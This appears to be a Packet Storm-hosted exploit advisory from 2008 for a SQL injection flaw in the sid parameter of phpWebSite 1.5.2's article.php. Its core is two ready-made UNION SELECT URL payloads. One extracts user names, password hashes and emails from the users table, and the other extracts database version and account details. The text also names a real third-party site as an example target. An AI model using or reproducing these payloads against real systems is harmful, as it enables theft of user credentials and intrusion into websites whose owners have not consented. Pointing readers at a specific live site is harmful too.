phpWebSite version 1.5.2 suffers from a remote SQL injection vulnerability in article.php.
569ff0d9844cf66a5386e2912f4616e1a0b8e36b122f3dde83ef524de631816c[~]-------------------------------------------------------------------------------------------------------------
[~] phpWebSite 1.5.2 [article.php?sid] - SQL injection Vulnerability
[~]
[~] http://phpwebsite.appstate.edu/
[~]
[~]
[~] ------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 14.10.2008
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~] ------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig
[~]-------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/article.php?sid=-1 UNION SELECT
1,2,concat(name,char(58),pass,char(58),email),4,5,6,7,8 FROM users
LIMIT 1,1/*
[~]
[~] http://site.com/article.php?sid=-1 UNION SELECT
1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8/*
[~]
[~]
[~]
[~] Example :-
[~]
[~] http://ares.ema.arrl.org/article.php?sid=SQL
[~]-------------------------------------------------------------------------------------------------------------
[~] btw; on some sites need to use -> LIMIT 1,1/* when you want to
get db information.
[~]-------------------------------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed